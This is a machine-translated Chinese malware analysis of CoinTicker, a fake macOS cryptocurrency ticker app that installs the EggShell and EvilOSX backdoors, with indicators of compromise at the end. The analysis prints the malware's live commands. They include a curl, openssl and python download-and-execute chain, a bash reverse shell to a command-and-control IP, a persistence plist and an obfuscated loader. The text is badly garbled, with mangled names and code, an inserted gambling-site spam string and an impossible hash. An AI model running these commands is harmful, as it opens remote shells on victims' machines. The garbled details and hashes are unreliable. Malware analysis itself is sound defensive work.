通过手柄1Vladimir的论坛的精明贡献者表示,一个名为Cininticker的App在周末表现出一些腥味的行为。似乎这个应用程序的内容不仅仅是一个不同的后门安装。
行为
从表面上看,CoinTicker应用程序似乎是一个合法的应用程序,可能对投资加密货币的人有用。下载后,该应用程序会在菜单栏上显示一个图标,显示有关比特币当前价格的信息。
应用程序的首选项允许用户自定义显示,显示有关各种加密货币的信息,包括比特币,etherium和monero。
虽然这一功能似乎是合法的,但应用程序实际上在用户不知情的情况下在后台做得不好。如果没有任何麻烦的迹象,比如请求根用户身份验证,就不会向用户提示有什么问题。
然而,该应用发布后,下载并安装了两个不同的开源后门组件:EvilOSX和EggShell。
该应用程序执行以下shell命令以下载麦斯科斯的eggShell服务器的自定义版本:
nohup curl -k -l -o /tmp/.info.enc https://github.com/youarenick/newproject/raw/master/info.enc;Openssl enc -aes-256-cbc -d -in /tmp/.info.enc out /tmp/.info.py -k 111111qq;python /tmp/.info.py.
该命令的第一部分从属于名为“yuarenick”的用户的GitHub页面下载编码文件,并将该文件保存到名为的隐藏文件.info.enc在私人/ tmp / /.接下来,它使用openssl将该文件解码为命名的隐藏的python文件.info.py.最后,它执行生成的Python脚本。
这.info.py脚本执行多个任务。首先它打开一个反向shell连接到命令和控制服务器,使用以下命令:
Nohup Bash&> /dev/tcp/94.156.189.77/2280 0>&1
(域名Seednode3.Parsicoin.net.解决此IP地址。)
接下来,它下载EggShell的mach-o二进制文件,并将其保存到/ TMP / ESPL:
/tmp/espl https://github.com/youarenick/newProject/raw/master/mac
最后,它在/tmp/.server.sh中创建并运行shell脚本,该shell脚本也建立了反向shell。
#!/ bin / bash nohup bash&> /dev/tcp/94.156.189.77/2280 0>&1
CoinTicker应用程序还创建了一个用户启动代理,名为.ESPL.PLIST.,定期运行相同的命令:
<?xml version = " 1.0 " encoding = " utf - 8 " ?> < !DOCTYPE plist公共”——/ /苹果/ / DTD plist 1.0 / / EN " " http://www.apple.com/DTDs/PropertyList-1.0.dtd " > < plist version = " 1.0 " > < dict > <键> AbandonProcessGroup < /关键> <真的/ > <键>标签< /关键> <字符串> com.apple.espl字符串< / > < >键ProgramArguments < /关键> <数组> <字符串> sh <字符串> / <字符串> - c <字符串> / <字符串> nohup curl - k - l - o / tmp / .info.enchttps://github.com/youarenick/newProject/raw/master/info.enc;Openssl enc -aes-256-cbc -d -in /tmp/.info.enc out /tmp/.info.py -k 111111qq;python /tmp/.info.pyRunAtLoad StartInterval 90
如果这看起来会导致espl二进制被多次启动,那确实是这样。
该软件还在用户的Containers文件夹中创建一个名为.upqzdhkkfcdsyxg.,它是一个名为PLQQVFEJVGO..(我们认为这些名称是随机的,但不幸的是Cininticker应用程序已停止运作,因此我们无法确认。)该脚本被编码以隐藏内容:
#!/ usr / bin / env python# - * - 编码:utf-8 - * - 导入操作系统导入getpass导入uuid def get_uid():return“”.join(x.encode(x.encode(x.hex“)for x in(getPass.getUser()+“ - ”+ str(uuid.getnode()))))))exec(“”。加入(OS.popen(“echo'U2FSDGVKX19GSBCJ4LQ2HZO27VQSEHTTTKBNTX9 ... TJO1GLH1 + 7CP7PDYA8YKBQUK4WHU0 / UQE'| OPENSSL AES-256-CBC -A -D -A-k%s -md md5“%get_uid())。ReadLines()))
提取脚本显示它是Bot.py.由Github User Marten4N6制作的邪恶后门的脚本。
#!/usr/bin/env python # -*- coding: utf-8 -*- """最小的机器人,从服务器加载所需的模块。"”“__author__ = " Marten4n6 " __license__ =“GPLv3”__version__ =“以下4.4.1”…
此脚本已被自定义为导致后台与服务器185.206.144.226上的服务器通信端口1339.恶意软件还创建一个名为的用户启动代理com.apple.eofhxpqvqhr.plist.旨在保持此脚本运行。
影响
虽然它是未知的究竟是什么目标,但蛋壳和邪恶的蛋壳都是广泛的背板,虽然可以用于各种目的。然而,由于恶意软件通过加密货币应用程序分发,因此恶意软件似乎是为了获得用户的加密货币,以便窃取硬币。
起初,这看起来可能是一个供应链的攻击,一个合法的应用程序的网站是黑客攻击分发恶意版本的应用程序。这种攻击多次发生在过去,比如当传播网站被黑客攻击(两次)分发KeRanger Keydnap,或者当一个手刹镜子服务器被黑了被攻击分发质子。
然而,经过进一步的检查,看起来这个应用程序可能从一开始就不合法。首先,应用程序通过域名进行分发coin-sticker.com.这与应用的名称很接近,但又不完全相同。如果这是一个合法的应用,那么把域名弄错就太草率了。更令人怀疑的是,这个域名似乎是在几个月前的7月13日注册的。
为此原因,必威平台APP伪的Mac除了此恶意软件的其他组件之外,还可检测Ciniticker应用程序,如OSX。EvilEgg.
关于此恶意软件的一个有趣的说明是,它没有必需的任何内容用户权限。根权不需要。往往有一个错误的过度强调恶意软件对root权限的需求,但这种恶意软件是一个完美的演示,恶意软件不需要这种特权来具有高危险可能性。
妥协指标
创建的文件:
/private/tmp/.info.enc / private/tmp/.info.py / private/tmp/.server.sh / private / tmp / espl〜/ library / launchagents / .epl.plist〜/ library / launchagents / com.Apple。[随机字符串] .Plist〜/库/容器/。[随机字符串] / [随机字符串]
网络连接:
94.156.189.77:2280 185.206.144.226:1339
SHA-256:
cointicker.zip f4f45e16dd276b948dedd8a5f8d55c922060884b9fe00143cb092eed693cddc4 espl efb5b32f87bfd6089912073cb33850c58640d59120c58640d59cb52d8c640d59cb52d8c630d59cb52d8c640d59cb52073cmb3853d97b4771b3850c58660
评论